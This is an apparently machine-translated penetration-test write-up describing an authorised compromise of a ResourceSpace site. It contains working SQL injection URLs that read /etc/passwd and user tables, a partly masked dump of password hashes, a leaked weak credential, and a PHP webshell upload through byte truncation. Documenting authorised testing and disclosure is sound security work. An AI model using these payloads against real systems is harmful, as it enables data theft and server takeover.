A process of successfully penetrating a website through vulnerability Mining

Cause

One of our customers wants us to perform penetration tests on their websites to discover their weaknesses and help improve security. After obtaining the penetration test authorization from the other party, we began to analyze the website.

Find breakthrough

The opposite site is a custom-developed CMS. After a series of scans and analyses, no available areas are found. Therefore, the second-level domain names are analyzed and a resource management substation is found, in the target operating system linux, only HTTP (port 80) is enabled, the whole site program is ResourceSpace, and an open source php site building program.

Vulnerability Mining

Because it is an open-source program, it is easier to mine vulnerabilities, so I decided to use this website as a breakthrough. So download the latest source code to the official website of resourcespace (http://www.resourcespace.org/), build a test environment locally and start the white box audit code. Most of the resourcespace functions can be used only after login, and our target website does not allow external registration of users, so we need to explore the vulnerabilities that can be exploited without logon verification.

The first step is to explore the vulnerabilities that are easy to use, such as SQL injection. After some grep, we found a call in pages/search_disk_usage.php:

$results=do_search(getval("search",""),getvalescaped("restypes",""),"relevance",getval("archive",""),-1,"desc",false,$starsearch,false,true);

Let's take a look at include/search_functions.php.

if($sql_filter!="") {$sql_filter.=" and ";}   $sql_filter.="archive='$archive'";             }returnsql_query($sql_prefix . "select distinct *,r2.hit_count score from (select$select from resource r $sql_join  where$sql_filter order by ref desc limit $last ) r2 order by $order_by" .$sql_suffix,false,$fetchrows);

A typical SQL injection vulnerability exists here. In the local test environment, visit the following URL for testing:

http://192.168.1.172/ResourceSpace/pages/search_disk_usage.php?archive=a'

Return Value:

It proves that the injection point exists. However, this ultra-long nested SQL injection is still a little difficult to use. I tried to construct a statement to close several statements and did not find a proper method for a long time. Because the other database is mysql, we are going to use the rand & groupby error method to try it out. The constructor statement is as follows:

http://192.168.1.172/ResourceSpace/pages/search_disk_usage.php?archive=a'%20and%20(SELECT%201%20FROM%20(select%20count(*),concat(floor(rand(0)*2),substring(load_file('/etc/passwd'),0,5))a%20from%20information_schema.tables%20group%20by%20a)b)%20and%20'1'='1

Indeed, I read the passwd file content. This is a method to report errors using a unique bug in mysql. It is also a common method of SQL injection. I will not go into details about the principle of this method. If you are interested, please refer: http://bugs.mysql.com/bug.php? Id = 8652.

The next step is to get the administrator password and input webshell in the background, so I tried the target website:

http://rs.XXXX.com/ResourceSpace/pages/search_disk_usage.php?archive=a'%20and%20(SELECT%201%20FROM%20(select%20count(*),concat(floor(rand(0)*2),(SELECT%20username%20from%20user%20limit%200,1))a%20from%20information_schema.tables%20group%20by%20a)b)%20and%20'1'='1

Return Value:

Password cracking

After the encrypted password is returned, the hope for success is quite large. Because manual injection is too troublesome, I wrote a program to run out all the accounts and passwords of the target website.

admin-----b****d93ce187f01b7e7c96b0b1df062Sp****erS-----a****437d2e18f2fe5bf623412427493J****J-----9****aa12a24a73953d5ab95567cd5d1n****nph-----6****7f9f3d7ea132ba42d349df99b01d****e-----1****dd082b77c13ca1ecafd1a0d7ac4N****iaA-----a****4dfd4c74c15d9e7ab2620639f21D****ahT-----c****cb83afadf07dda15b8a7716068aJ****P-----d****001e3b5f26967007ab2647b8ae6b****rtm-----9****6d20cd016ffb3bc9593bd3ed0f3J****R-----a****4b643d1e69aa8d51f9c616e46c9L****A-----b****7d728a7048add07b6404e6854ac……

The password looks like MD5 encryption, but further viewing the source code finds that the situation is not optimistic. the encryption is MD5 after the user name salt is added:

md5($salt+$username+$pass)

This means that you cannot query on websites such as iis5 or use a rainbow table to crack the password. Instead, you can only choose brute-force cracking: (however, the default password policy of resourcespace requires that the password must contain both letters and numbers, in this way, the hope for cracking is even smaller, so I wrote a cracking program:

We hung up our NB dictionary and started to run the password. We didn't have much hope for it, but we always wanted to leave it to people who were brave enough to try it. A user actually used a weak password.

Although it is not an admin account, you can do a lot of things like logging in successfully. Our next goal is to get webshell and then get system permissions.

File Upload

Log on to the target website using choib/qwer1234, and find that there is a place where images can be uploaded, and PHP files can be uploaded through byte truncation, but there is a big problem, after the uploaded file is renamed as a random file name, we cannot find the uploaded webshell. The Penetration Process is once again deadlocked.

Looking back, we can see the resourcespace program code. Through the analysis program, we can find that the program can force an error by submitting an abnormal request to expose the uploaded file name.

When you click to download an image, the URL of the image is not directly connected, but accessed

/ResourceSpace/pages/download_progress.php?ref=24&ext=php&k=&alternative=1&search=%21last1000&offset=0&archive=0&sort=DESC&order_by=relevance

We can modify the HTTP request through Burp to let the program report an error:

In this way, the uploaded file is found and the webshell is obtained on the target system:

Postscript

After obtaining the shell, we have done a lot of work, such as Elevation of Privilege to obtain the root, Intranet penetration, etc. However, we will not detail it here because it involves some sensitive information of the customer. The purpose of this article is to introduce the breakthrough of penetration through mining and exploiting the resourcespace vulnerability.

Finally, as a responsible security vendor, we submitted this vulnerability to the resourcespace official team, hoping to make some contributions to improving the security of open-source software.